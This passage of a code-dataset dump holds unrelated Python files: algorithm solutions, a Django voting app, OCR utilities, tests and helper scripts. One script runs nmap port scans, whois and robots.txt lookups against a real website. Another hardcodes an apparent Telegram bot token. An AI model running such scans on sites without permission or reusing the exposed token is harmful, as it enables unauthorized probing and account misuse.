super().create_cwa_instances(triples=triples)\n\n if self.multimodal_data is None:\n self._create_numeric_literals()\n\n return MultimodalCWAInstances(instances=cwa_instances.instances,\n entity_to_id=cwa_instances.entity_to_id,\n relation_to_id=cwa_instances.relation_to_id,\n kg_assumption=cwa_instances.kg_assumption,\n multimodal_data=self.multimodal_data,\n data_relation_to_id=self.literals_to_id,\n labels=cwa_instances.labels)\n","repo_name":"SmartDataAnalytics/POEM","sub_path":"src/poem/instance_creation_factories/triples_numeric_literals_factory.py","file_name":"triples_numeric_literals_factory.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"37284019898","text":"#\n# @lc app=leetcode id=2327 lang=python3\n#\n# [2327] Number of People Aware of a Secret\n#\n\n# @lc code=start\nclass Solution:\n def peopleAwareOfSecret(self, n: int, delay: int, forget: int) -> int:\n\n # dp = [1] + [0] * (n - 1)\n # MOD = 10**9 + 7\n # share = 0\n # for i in range(1, n):\n # dp[i] = share = (share + dp[i - delay] - dp[i - forget]) % MOD\n # return sum(dp[-forget:]) % MOD\n\n dp = [1] + [0] * forget\n MOD = 10**9 + 7\n share = 0\n for i in range(1, n):\n dp[i % forget] = share = (share + dp[(i - delay) % forget] - dp[i % forget]) % MOD\n return sum(dp) % MOD\n \n# @lc code=end\n\n","repo_name":"chenxu0602/LeetCode","sub_path":"2327.number-of-people-aware-of-a-secret.py","file_name":"2327.number-of-people-aware-of-a-secret.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"31502631729","text":"from m_domain_name import *\nfrom m_ip_address import *\nfrom m_make_folder import *\nfrom m_nmap import *\nfrom m_robots_scan import *\nfrom m_whois import *\n\n#sites 폴더 밑 각 사이트 정보를 쌓자\nROOT_DIR = 'sites'\ncreate_dir(ROOT_DIR)\n\ndef gather_info(name, url):\n domain_name = get_domain_name(url)\n ip_address = get_ip_address(url)\n nmap = get_nmap(' -F', ip_address)#F옵션은 빠르게 스캔하라는뜻\n robots_txt = get_robots_txt(url)\n whois = get_whois(domain_name)\n create_report(name, url, domain_name, nmap, robots_txt, whois)\n pass\ndef create_report(name, full_url, domain_name, nmap, robots_txt, whois):\n project_dir(ROOT_DIR + \"/\" + name)\n create_dir(project_dir)\n write_file(project_dir + \"/full_url.txt\", full_url)\n write_file(project_dir + \"/domain_name.txt\", domain_name)\n write_file(project_dir + \"/nmap.txt\", nmap)\n write_file(project_dir + \"/robots_txt.txt\", robots_txt)\n write_file(project_dir + \"/whois.txt\", whois)\ngather_info(\"tistory\", \"https://www.tistory.com/\")","repo_name":"namkiseung/python_BasicProject","sub_path":"Network_program/port_scan_tool/m_scan_main.py","file_name":"m_scan_main.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"9613466799","text":"\n\nn,a,b=map(int, input().split())\ns=[]\nfor i in range(n):\n s.append(int(input()))\ns.sort()\nif s[0]==s[-1]:\n print(-1)\nelse:\n p=b/(s[-1]-s[0])\n q=a-(p*(sum(s)/n))\n print(p,q)\n","repo_name":"clarinet758/atcoder","sub_path":"arc/r026_050/r043/a1.py","file_name":"a1.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16681191543","text":"#-*- coding: utf-8 -*-\nfrom django.views import generic\nfrom bitpoint.messenger.models import Message\nfrom decorators import ajax_required\nfrom django.http import HttpResponseRedirect\nfrom .models import Aspirant, Office, Voter, User\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n\nclass IndexView(generic.ListView):\n template_name = 'naits/index.html'\n context_object_name = 'latest_poll_list'\n paginate_by = 2\n\n def get_queryset(self):\n return Office.objects.all()[:5]\n\n\nclass DetailView(generic.DetailView):\n model = Office\n template_name = 'naits/detail.html'\n\n\n@login_required\ndef vote(request, poll_id):\n p = get_object_or_404(Office, pk=poll_id)\n if Voter.objects.filter(office_id=poll_id, student_id=request.user.id).exists():\n return render(request, 'naits/detail.html', {\n 'office': p, \n 'error_message': 'You already vote'\n })\n try:\n selected_choice = p.aspirant_set.get(pk=request.POST['aspirants'])\n except (KeyError, Aspirant.DoesNotExist):\n # Redisplay the poll voting form.\n return render(request, 'naits/detail.html', {\n 'office': p,\n 'error_message': \"You didn't select an aspirant.\",\n })\n else:\n selected_choice.votes += 1\n selected_choice.save()\n setuser = Voter(student=request.user, office=p)\n setuser.save()\n # Always return an HttpResponseRedirect after successfully dealing\n # with POST data. This prevents data from being posted twice if a\n # user hits the Back button.\n return HttpResponseRedirect('/')\n\n\n@login_required\ndef students(request):\n students_list = User.objects.filter(is_active=True, is_student=True).order_by('-id')\n page = request.GET.get('page', 1)\n paginator = Paginator(students_list, 9)\n try:\n students = paginator.page(page)\n except PageNotAnInteger:\n students = paginator.page(1)\n except EmptyPage:\n students = paginator.page(paginator.num_pages)\n return render(request, 'students/students_list.html', {'students': students})\n\n\n@login_required\ndef staffs(request):\n staffs_list = User.objects.filter(is_active=True, is_d_staff=True).order_by('-id')\n page = request.GET.get('page', 1)\n paginator = Paginator(staffs_list, 9)\n try:\n staffs = paginator.page(page)\n except PageNotAnInteger:\n staffs = paginator.page(1)\n except EmptyPage:\n staffs = paginator.page(paginator.num_pages)\n return render(request, 'staffs/staffs_list.html', {'staffs': staffs})\n\n@login_required\ndef excos(request):\n excos_list = User.objects.filter(is_active=True, is_exco=True).order_by('-id')\n page = request.GET.get('page', 1)\n paginator = Paginator(excos_list, 9)\n try:\n excos = paginator.page(page)\n except PageNotAnInteger:\n excos = paginator.page(1)\n except EmptyPage:\n excos = paginator.page(paginator.num_pages)\n return render(request, 'excos/excos_list.html', {'excos': excos})\n","repo_name":"Abdoulrasheed/Poll","sub_path":"bitpoint/voting/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"71517895844","text":"from Seq0 import *\n\nprint(\"-----| Exercise 8 |------\")\n\nFOLDER = \"../Session-04/\"\nbases = [\"A\", \"C\", \"T\", \"G\"]\nfiles_list = [\"U5\", \"ADA\", \"FRAT1\", \"FXN\", \"RNU6_269P\"]\n\nfor file in files_list:\n sequence = seq_read_fasta(FOLDER + file + \".txt\")\n dict_bases = seq_count(sequence)\n min_value = 0\n best_base = \"\"\n for base, value in dict_bases.items():\n while value > min_value:\n min_value = value\n best_base = base\n\n print(\"Gene\", file, \" : Most frequent Base: \", best_base)\n","repo_name":"Obijuan/2019-2020-PNE-Practices","sub_path":"P0/winner-Enrique-Feito.py","file_name":"winner-Enrique-Feito.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"36187960744","text":"# libraries\nimport os\nimport sys\n\n# function to make full paths\ndef make_full_path(parent_dir, files):\n\tfull_paths = []\n\tfor i in range(len(files)):\n\t\tfull_paths.append(os.path.join(parent_dir, files[i]))\n\treturn full_paths\n\n# function to search for search_string in a given file\ndef search_for_searchstring(file_path, search_string):\n\tfile_ptr = file(file_path, \"r\")\n\tlines = file_ptr.readlines()\n\tfor i in range(len(lines)):\n\t\tif(lines[i].find(search_string) != -1):\n\t\t\tprint(i + 1, file_path)\n\n# get directory path and if it doesn't exists, then terminate execution\nsearch_dir = raw_input(\"Enter the path of Directory: \")\nif(os.path.exists(search_dir) == False):\n\tprint(\"x x x Path Not Found x x x\")\n\tsys.exit(0)\n\n# check if the entered path is directory or not, if not, then terminate execution\nif(os.path.isdir(search_dir) == False):\n\tprint(\"x x x Entered path is not a directory x x x\")\n\tsys.exit(0)\n\n# get type of file look into for search string\nfile_types = raw_input(\"Enter comma-separated file extensions (NO SPACE, WITHOUT DOT) to look for search string: \")\n# check extension list should not have space, if space is there, terminate execution\nif(file_types.find(\" \") != -1):\n\tprint(\"x x x Found spaces x x x\")\n\tsys.exit(0)\nfile_types = file_types.split(\",\")\n\n# get search string\nsearch_string = raw_input(\"Enter search string: \")\n\n# search in all files under each sub-directory\nfiles = os.listdir(search_dir)\npaths_list = make_full_path(search_dir, files)\ni = 0\nwhile(i < len(paths_list)):\n\tcurrent_path = paths_list[i]\n\t# if current_path is a directory\n\tif(os.path.isdir(current_path) == True):\n\t\tfiles = os.listdir(current_path)\n\t\tpaths_list = paths_list + make_full_path(current_path, files)\n\t# if current_path is a file\n\tif(os.path.isfile(current_path) == True):\n\t\tfilename = current_path.split(\"/\")[len(current_path.split(\"/\")) - 1]\n\t\tif(len(filename.split(\".\")) > 1):\n\t\t\tfile_extension = current_path.split(\".\")[1]\n\t\t\tif((file_extension in file_types) == True):\n\t\t\t\tsearch_for_searchstring(current_path, search_string)\n\t# increment index var\n\ti = i + 1\n","repo_name":"sansinghsanjay/search_string","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8837442144","text":"from ete3 import Tree\nimport openpyxl\n\n\nwb_obj = openpyxl.load_workbook(\"../data/phylogeny/Lineage_of_32_sp.xlsx\")\nsheet = wb_obj.active\n\nfor i, cols in enumerate(sheet.columns):\n if i == 0:\n ntid = tuple(map(lambda x: x.value, cols[2:]))\n elif i == 7:\n species = tuple(map(lambda x: x.value, cols[2:]))\n elif i == 8:\n labels = tuple(map(lambda x: x.value, cols[2:]))\n\nprefixed_names = map(lambda x: \"-\".join(x), zip(ntid, species))\nnames = dict(zip(labels, prefixed_names))\n\nt = Tree(\"../data/phylogeny/bac120_r95.tree\", format=1, quoted_node_names=True)\nprint(\"Pruning...\")\nt.prune(labels)\nprint(\"Done pruning\")\n\n# Replace IDs with species names\nfor n in t.get_leaves():\n n.name = names[n.name]\n\nt.write(format=9, quoted_node_names=True, outfile=\"Figure-1-B.tree\")\n","repo_name":"grp-bork/multiomics_Wuyts_2022","sub_path":"Figure_1/Figure_1_B.py","file_name":"Figure_1_B.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"43393287145","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nCreated on 2015年10月10日\n\n@author: ruixidong\n'''\nfrom DataAccess.Handler import RedisCli\nfrom common import utility\nimport time,json\ndef exists(code):\n return RedisCli.hexists(\"Q2k:Codes\", code)\n\ndef apply(url,bites,hours):\n md5=utility.md5code(url)\n RedisCli.hset(\"Q2k:Urls:%s\"%md5,\"state\",0)\n RedisCli.rpush(\"Q2k:Queue:Apply\",json.dumps(dict(url=url,bites=bites,hours=hours)))\n\ndef get_apply_url():\n s=RedisCli.lpop(\"Q2k:Queue:Apply\")\n if s!=None:\n return json.loads(s) \n\ndef get_code(url):\n md5=utility.md5code(url)\n data = RedisCli.hgetall(\"Q2k:Urls:%s\"%md5)\n data[\"state\"] = int(data[\"state\"])\n return data\n\ndef get_url(code):\n return RedisCli.hget(\"Q2k:Codes\",code)\n\n\ndef regist_url(url,bites=8,hours=48):\n \n md5=utility.md5code(url)\n \n cinfo = dict(state=0,code=\"\",url=url,expire=0)\n cinfo.update(RedisCli.hgetall(\"Q2k:Urls:%s\"%md5))\n if cinfo[\"state\"]==\"0\":\n if cinfo[\"code\"]==\"\":\n while True:\n code = utility.generateCode(bites)\n if not exists(code):\n break\n time.sleep(0.1)\n cinfo[\"code\"]=code\n \n \n RedisCli.hset(\"Q2k:Codes\", cinfo[\"code\"],url)\n RedisCli.hset(\"Q2k:Urls:%s\"%md5,\"code\",cinfo[\"code\"])\n RedisCli.hset(\"Q2k:Urls:%s\"%md5,\"state\",1)\n \n #默认将过期时间向后延期\n RedisCli.hset(\"Q2k:Urls:%s\"%md5,\"expire\",time.time()+hours*60*60)\n return cinfo[\"code\"]\n ","repo_name":"drxbate/q2k","sub_path":"WEB-APP/DataAccess/QrCode.py","file_name":"QrCode.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35848837651","text":"import unittest\nimport io\nimport sys\nfrom mineSweeper import MineSweeper\n\nclass test_MineSweeper(unittest.TestCase):\n def setUp(self):\n #given - given for all tests.\n self.game = MineSweeper()\n self.game.createField(3, 3)\n\n def test_createField(self):\n #given - setUp\n\n #when\n field= self.game.field\n\n #then\n self.assertEqual( field , [['.','.','.'],['.','.','.'],['.','.','.']])\n\n def test_layMine(self):\n #given - setUp\n\n #when\n self.game.layMine(0,0)\n\n #then\n self.assertEqual(self.game.field, [['*', '.', '.'], ['.', '.', '.'], ['.', '.', '.']])\n\n\n\n def test_printField(self):\n #given - setUp and capture output methods:\n capturedOutput = io.StringIO()\n sys.stdout = capturedOutput\n\n #when\n self.game.printField()\n\n #then\n sys.stdout = sys.__stdout__\n self.assertEqual(capturedOutput.getvalue(),'\". . .\"\\n\". . .\"\\n\". . .\"\\n')\n\n\n\n def test_play_hit_mine(self):\n #given - setUp\n self.game.layMine(0, 0)\n\n #when\n self.game.play(0,0)\n\n #then\n self.assertEqual(self.game.fieldToPrint, [['*', '.', '.'], ['.', '.', '.'], ['.', '.', '.']])\n\n\n\n def test_play_hit_near_mine(self):\n #given - setUp\n self.game.layMine(0, 0)\n\n #when\n self.game.play(0, 2)\n\n #then\n self.assertEqual(self.game.fieldToPrint, [['*', '1', '+'], ['1', '1', '+'], ['+', '+', '+']])\n\n\n def test_status_PLAYING(self):\n #given - setUp\n self.game.layMine(0, 0)\n self.game.layMine(1, 1)\n\n #when\n self.game.play(2,2)\n\n\n #then\n self.assertEqual(self.game.status() , \"PLAYING\")\n\n def test_status_LOST(self):\n # given - setUp\n self.game.layMine(0, 0)\n self.game.layMine(1, 1)\n\n #when\n self.game.play(1,1)\n\n #then\n self.assertEqual(self.game.status(), \"LOST\")\n\n def test_status_WIN(self):\n # given - setUp\n self.game.layMine(0, 1)\n self.game.layMine(1, 0)\n self.game.layMine(2, 1)\n self.game.layMine(1, 2)\n\n #when\n self.game.play(0,0)\n self.game.play(1, 1)\n self.game.play(2, 2)\n self.game.play(0, 2)\n self.game.play(2, 0)\n\n #then\n self.assertEqual(self.game.status(), \"WIN\")\n\n\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"TomDamri1/MineSweeper-TDD","sub_path":"test_mineSweepr.py","file_name":"test_mineSweepr.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30279553198","text":"from flask import Flask, render_template, Request\nfrom markupsafe import escape\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.sql import text\nimport sqlite3\n\napp = Flask(__name__)\ndb_path = 'backend/mock.db'\nconnection = sqlite3.connect(db_path)\n\nwith open('backend/schema.sql') as f:\n connection.executescript(f.read())\n\ncur = connection.cursor()\ncur.execute(\"INSERT INTO posts (title, content) VALUES (?, ?)\",\n ('First Post', 'Content for the first post')\n )\ncur.execute(\"INSERT INTO posts (title, content) VALUES (?, ?)\",\n ('Second Post', 'Content for the second post')\n )\nconnection.commit()\nconnection.close()\n\ndef get_db_connection():\n conn = sqlite3.connect(db_path)\n conn.row_factory = sqlite3.Row\n return conn\n\n# for later\n@app.route(\"/\")\ndef index():\n conn = get_db_connection()\n posts = conn.execute('SELECT * FROM posts').fetchall()\n conn.close()\n return render_template('index.html', posts=posts)\n\n# for later use\n@app.route('/user/')\ndef show_user_profile(username):\n # show the user profile for that user\n return f'User {escape(username)}'","repo_name":"cathystanton/hackMIT22","sub_path":"backend/storeData.py","file_name":"storeData.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28821411796","text":"import logging\r\nfrom telegram.ext import Updater, CommandHandler\r\nimport youtube_dl\r\ndef start(update, context):\r\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Welcome! Please enter the YouTube video URL to download music.\")\r\ndef download_audio(update, context):\r\n url = update.message.text\r\n ydl_opts = {\r\n 'format': 'bestaudio/best',\r\n 'postprocessors': [{\r\n 'key': 'FFmpegExtractAudio',\r\n 'preferredcodec': 'mp3',\r\n 'preferredquality': '192',\r\n }],\r\n }\r\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\r\n info = ydl.extract_info(url, download=False)\r\n title = info['title']\r\n ydl.download([url])\r\n context.bot.send_message(chat_id=update.effective_chat.id, text=f\"Downloaded: {title}\")\r\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\r\nupdater = Updater(token='6054021931:AAHCMiCAdS5XJM4z2mPe1g0gVS7tOoWy6Uk', use_context=True)\r\ndispatcher = updater.dispatcher\r\nstart_handler = CommandHandler('start', start)\r\ndispatcher.add_handler(start_handler)\r\ndispatcher.add_handler(MessageHandler(Filters.text, download_audio))\r\nupdater.start_polling()\r\n\r\n","repo_name":"Mevdevoloper/YTDL","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5464757809","text":"from time import sleep\nfrom datetime import datetime\n\nSTART_DATE = datetime(2021, 7, 13)\nEND_DATE = datetime(2036, 7, 12, hour=23, minute=59, second=59)\nKMS = 11269\n\ntry:\n while True:\n SECONDS = (datetime.now() - START_DATE).total_seconds()\n MINUTES = (datetime.now() - START_DATE).total_seconds() / 60\n HOURS = (datetime.now() - START_DATE).total_seconds() / 60 / 60\n DAYS = (datetime.now() - START_DATE).total_seconds() / 60 / 60 / 24\n MONTHS = (datetime.now() - START_DATE).total_seconds() / 60 / 60 / 24 / 30.4375\n YEARS = (datetime.now() - START_DATE).total_seconds() / 60 / 60 / 24 / 365\n YEARS_LEFT = (END_DATE - datetime.now()).total_seconds() / 60 / 60 / 24 / 365\n TOTAL_KMS = KMS / YEARS * YEARS_LEFT + KMS\n try:\n print(f\"\"\" Seconds: {round(SECONDS)}, {round(KMS/SECONDS, 12):12.12f} \\\nMinutes: {round(MINUTES)}, {round(KMS/MINUTES, 10):10.10f} \\\nHours: {round(HOURS)}, {round(KMS/HOURS, 8):8.8f} \\\nDays:{round(DAYS)}, {round(KMS/DAYS, 7):7.7f} \\\nMonth: {round(MONTHS)}, {round(KMS/MONTHS, 5):5.5f} \\\nYear: {round(YEARS)}, {round(KMS/YEARS,4):4.4f} \\\nTotal KMs: {round(TOTAL_KMS, 1):6.1f}\"\"\", end=\"\\r\")\n except ZeroDivisionError:\n ...\n sleep(0.95)\nexcept KeyboardInterrupt:\n\tYEARS = (datetime.now() - START_DATE).total_seconds() / 60 / 60 / 24 / 365\n\tYEARS_LEFT = (END_DATE - datetime.now()).total_seconds() / 60 / 60 / 24 / 365\n\tTOTAL_KMS = KMS / YEARS * YEARS_LEFT + KMS\n\tprint(f\"\"\" Total KMs: {round(TOTAL_KMS, 1):6.1f} \"\"\", end=\"\\n\")\n","repo_name":"alvynabranches/bank_assignment","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"34458952312","text":"import json\nimport os\nimport time\nimport re\nfrom functools import wraps\nfrom logging.handlers import RotatingFileHandler\n\nfrom pdf2image import convert_from_path\nfrom PIL import Image, ImageDraw, ImageFont\n\nimport logging\nfrom unidecode import unidecode\nimport datetime\nimport logging\n\nlog_format = \"%(asctime)s::%(levelname)s::%(name)s::\" \\\n \"%(filename)s::%(lineno)d::%(message)s\"\nlogger = logging.getLogger(__name__)\n\n# To override the default severity of logging\nlogger.setLevel('DEBUG')\n\n# Use FileHandler() to log to a file\nfile_handler = RotatingFileHandler(\"log/ocr_document.log\",\n # mode='a',\n maxBytes=5 * 1024 * 1024,\n backupCount=2,\n encoding=None)\nformatter = logging.Formatter(log_format)\nfile_handler.setFormatter(formatter)\n\n# Don't forget to add the file handler\nlogger.addHandler(file_handler)\n\n# Draw text box and text in image\ndef draw_result(dt_boxes, text_array, image, font_path):\n for index, box in enumerate(dt_boxes):\n box = np.array(box).astype(np.int32).reshape(-1, 2)\n cv2.polylines(image, [box], True, color=(255, 255, 0), thickness=1)\n\n # Convert to Image to draw text vietnamese\n image = Image.fromarray(image)\n img_new = image.copy()\n draw = ImageDraw.Draw(img_new)\n color = (0, 0, 255)\n # font_path = \"/home/tms/Documents/TaiDV/projects/ocr/ocr_framework/PaddleOCR/doc/fonts/latin.ttf\"\n # font_path = \"/usr/share/fonts/truetype/ubuntu-font-family/Ubuntu-B.ttf\"\n # font_path = \"/usr/share/fonts/truetype/dejavu/DejaVuSans-Bold.ttf\"\n\n for index, box in enumerate(dt_boxes):\n box = np.array(box).astype(np.int32).reshape(-1, 2)\n text = text_array[index]\n scale = 1 # this value can be from 0 to 1 (0,1] to change the size of the text relative to the image\n imageWidth = max((box[1][0] - box[0][0]), (box[2][0] - box[3][0]))\n imageHeight = max((box[3][1] - box[0][1]), (box[2][1] - box[1][1]))\n fontScale = min(imageWidth, imageHeight) / (1.5 / scale)\n font = ImageFont.truetype(font_path, int(fontScale), encoding='utf-8')\n if index == 0:\n box[3][0] = 0\n draw.text((box[3][0], box[3][1]), text, fill=color, font=font)\n\n img_new = Image.blend(image, img_new, 0.5)\n return np.array(img_new)\n\n\n# Crop image form textbox\ndef crop_image(image, point):\n top_left_x = int(min([point[0][0], point[1][0], point[2][0], point[3][0]]))\n top_left_y = int(min([point[0][1], point[1][1], point[2][1], point[3][1]]))\n bot_right_x = int(max([point[0][0], point[1][0], point[2][0], point[3][0]]))\n bot_right_y = int(max([point[0][1], point[1][1], point[2][1], point[3][1]]))\n\n return image[max(top_left_y - int((bot_right_y - top_left_y) / 7), 0): \\\n max(bot_right_y + int((bot_right_y - top_left_y) / 7), 0), \\\n top_left_x: bot_right_x]\n\n\ndef timeit(func):\n @wraps(func)\n def timeit_wrapper(*args, **kwargs):\n start_time = time.perf_counter()\n result = func(*args, **kwargs)\n end_time = time.perf_counter()\n total_time = end_time - start_time\n logger.info(f'Function {func.__name__}{args} {kwargs} Took {total_time:.4f} seconds')\n return result\n\n return timeit_wrapper\n\n\n# Load image from file (jpg, pdf)\ndef load_array_image_from_file(path_file):\n filename = os.path.split(path_file)[-1]\n filename_split = filename.split(\".\")\n # check file pdf and retrive first page\n if filename_split[-1] == \"pdf\":\n images = convert_from_path(path_file)\n if len(images) == 0:\n logger.info(\"Error in loading pdf: {}\".format(path_file))\n image = images[0]\n image = np.array(image)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n else: # image\n image = cv2.imread(path_file)\n if image is None:\n logger.info(\"Error in loading image: {}\".format(path_file))\n else:\n logger.info(\"Loaded image: {}\".format(path_file))\n\n return image\n\n\ndef save_image_postprocess(result_boxes, result_array_text, image,\n path_font_show, path_file, path_folder_output):\n image_drawed = draw_result(result_boxes, result_array_text,\n image, path_font_show)\n filename = os.path.split(path_file)[-1]\n filename_split = filename.split(\".\")\n if filename_split[-1] == \"pdf\":\n filename_split[-1] = \"jpg\"\n filename = \".\".join(filename_split)\n path_file = os.path.join(path_folder_output,\n \"processed_{}\".format(filename))\n cv2.imwrite(path_file, image_drawed)\n logger.info(\"The visualized image saved in {}\".format(path_file))\n\n\n# Find answer for text box based on check question in position right on a line\ndef check_line_answer_right(list_text_sorted, list_box_sorted, index):\n list_text = []\n list_box = []\n # Select 2 text box top_left_y sorted above and bottom\n y_min = min(list_box_sorted[index][i][1] for i in range(4))\n y_max = max(list_box_sorted[index][i][1] for i in range(4))\n len_list_text = len(list_text_sorted)\n if index > 2 and index < (len_list_text - 2):\n index_check = [index - 2, index - 1, index + 1, index + 2]\n for i in index_check:\n # Check point between [y_min, y_max]\n box_temp = list_box_sorted[i]\n y_between = (min(box_temp[i][1] for i in range(4)) +\n max(box_temp[i][1] for i in range(4))) / 2\n\n if y_between < y_max and y_between > y_min:\n list_text.append(list_text_sorted[i])\n list_box.append(list_box_sorted[i])\n\n return list_text, list_box\n else:\n return [], []\n\n\n# import the necessary packages\nimport numpy as np\nimport cv2\n\n\ndef margin_pst(point):\n # top_left_x = int(min([point[0][0], point[1][0], point[2][0], point[3][0]]))\n top_left_y = int(min([point[0][1], point[1][1], point[2][1], point[3][1]]))\n # bot_right_x = int(max([point[0][0], point[1][0], point[2][0], point[3][0]]))\n bot_right_y = int(max([point[0][1], point[1][1], point[2][1], point[3][1]]))\n\n margin = int((bot_right_y - top_left_y) / 7)\n point[0][0] = point[0][0] - margin\n point[0][1] = point[0][1] - margin\n point[1][0] = point[1][0] + margin\n point[1][1] = point[1][1] - margin\n point[2][0] = point[2][0] + margin\n point[2][1] = point[2][1] + margin\n point[3][0] = point[3][0] - margin\n point[3][1] = point[3][1] + margin\n\n return point\n\n\ndef order_points(pts):\n # initialzie a list of coordinates that will be ordered\n # such that the first entry in the list is the top-left,\n # the second entry is the top-right, the third is the\n # bottom-right, and the fourth is the bottom-left\n rect = np.zeros((4, 2), dtype=\"float32\")\n # the top-left point will have the smallest sum, whereas\n # the bottom-right point will have the largest sum\n s = pts.sum(axis=1)\n rect[0] = pts[np.argmin(s)]\n rect[2] = pts[np.argmax(s)]\n # now, compute the difference between the points, the\n # top-right point will have the smallest difference,\n # whereas the bottom-left will have the largest difference\n diff = np.diff(pts, axis=1)\n rect[1] = pts[np.argmin(diff)]\n rect[3] = pts[np.argmax(diff)]\n # return the ordered coordinates\n return rect\n\n\ndef four_point_transform(image, pts):\n # obtain a consistent order of the points and unpack them\n # individually\n rect = order_points(pts)\n (tl, tr, br, bl) = rect\n # compute the width of the new image, which will be the\n # maximum distance between bottom-right and bottom-left\n # x-coordiates or the top-right and top-left x-coordinates\n widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n maxWidth = max(int(widthA), int(widthB))\n # compute the height of the new image, which will be the\n # maximum distance between the top-right and bottom-right\n # y-coordinates or the top-left and bottom-left y-coordinates\n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n maxHeight = max(int(heightA), int(heightB))\n # now that we have the dimensions of the new image, construct\n # the set of destination points to obtain a \"birds eye view\",\n # (i.e. top-down view) of the image, again specifying points\n # in the top-left, top-right, bottom-right, and bottom-left\n # order\n dst = np.array([\n [0, 0],\n [maxWidth - 1, 0],\n [maxWidth - 1, maxHeight - 1],\n [0, maxHeight - 1]], dtype=\"float32\")\n # compute the perspective transform matrix and then apply it\n M = cv2.getPerspectiveTransform(rect, dst)\n warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n # return the warped image\n return warped\n\n\ndef read_json(file_path):\n with open(file_path, \"r\") as f:\n return json.load(f)\n\n\ndef rotate_image(image, result_boxes):\n # Find index line with maximum width\n width_max = 0\n index_width_max = None\n for index, box in enumerate(result_boxes):\n left_top_point = box[0]\n right_bottom_point = box[2]\n\n width_temp = right_bottom_point[0] - left_top_point[0]\n if width_temp > width_max:\n width_max = width_temp\n index_width_max = index\n\n if index_width_max == None:\n logger.info(\"Error value of result_boxes\")\n return image\n\n else:\n angle = cv2.minAreaRect(result_boxes[index_width_max])[-1]\n if angle < 45:\n angle = angle\n else:\n angle = angle - 90\n (h, w) = image.shape[:2]\n center = (w // 2, h // 2)\n M = cv2.getRotationMatrix2D(center, angle, 1.0)\n rotated_image = cv2.warpAffine(image, M, (w, h), flags=cv2.INTER_CUBIC,\n borderMode=cv2.BORDER_REPLICATE)\n return rotated_image\n\n\ndef rotate_image(image, result_boxes):\n # Find index line with maximum width\n width_max = 0\n index_width_max = None\n for index, box in enumerate(result_boxes):\n left_top_point = box[0]\n right_bottom_point = box[2]\n width_temp = right_bottom_point[0] - left_top_point[0]\n if width_temp > width_max:\n width_max = width_temp\n index_width_max = index\n if index_width_max == None:\n logger.info(\"Error value of result_boxes\")\n return image, None\n else:\n angle = cv2.minAreaRect(result_boxes[index_width_max])[-1]\n if angle < 45:\n angle = angle\n else:\n angle = angle - 90\n (h, w) = image.shape[:2]\n center = (w // 2, h // 2)\n M = cv2.getRotationMatrix2D(center, angle, 1.0)\n rotated_image = cv2.warpAffine(image, M, (w, h), flags=cv2.INTER_CUBIC,\n borderMode=cv2.BORDER_REPLICATE)\n return rotated_image, angle\n\n\ndef matching_box(result_boxes, result_texts, index_title, image):\n result_boxes_sorted = []\n result_texts_sorted = []\n (height, width, _) = image.shape\n for index, box in enumerate(result_boxes):\n left_top_point = box[0]\n left_bottom_point = box[3]\n\n # Match box have index title > 2\n if index < index_title + 2:\n result_texts_sorted.append(result_texts[index])\n result_boxes_sorted.append(result_boxes[index])\n continue\n # Match box have index title > 2 and smaller len box because full stack\n if left_top_point[0] < width / 4 and index < len(result_boxes) - 2:\n y_start_line = left_top_point[1]\n y_end_line = left_bottom_point[1]\n # Select 2 box above and 2 box below\n index_check = [index - 2, index - 1, index + 1, index + 2]\n box_ok = [] # box satisfy\n text_ok = [] # text satisfy\n for i in index_check:\n y_between = (min(result_boxes[i][j][1] for j in range(4)) +\n 